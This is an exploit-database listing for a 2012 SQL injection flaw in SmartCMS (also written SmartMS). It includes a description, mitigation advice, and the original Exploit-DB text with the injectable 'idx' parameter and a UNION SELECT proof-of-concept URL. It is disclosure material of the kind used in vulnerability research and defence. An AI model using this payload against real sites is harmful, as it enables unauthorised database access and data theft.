SmartCMS - exploit.company

vendor:

SmartMS

by:

NoGe

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: SmartMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

SmartCMS <= SQL Injection Vulnerability

A SQL injection vulnerability exists in SmartCMS, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be exploited to manipulate the database content, disclose sensitive information, or even execute arbitrary system commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=============================================================================================================
  
  [o] SmartCMS <= SQL Injection Vulnerability
   
       Software : SmartMS
       Vendor   : http://smartcms.nl/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
 
=============================================================================================================
 
  [o] Exploit
 
       http://localhost/[path]/index.php?idx=[SQLi]
 
 
  [o] PoC
 
       http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
 
=============================================================================================================
 
  [o] Greetz
 
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{
 
=============================================================================================================
 
  [o] November 26 2012 - Papua, Indonesia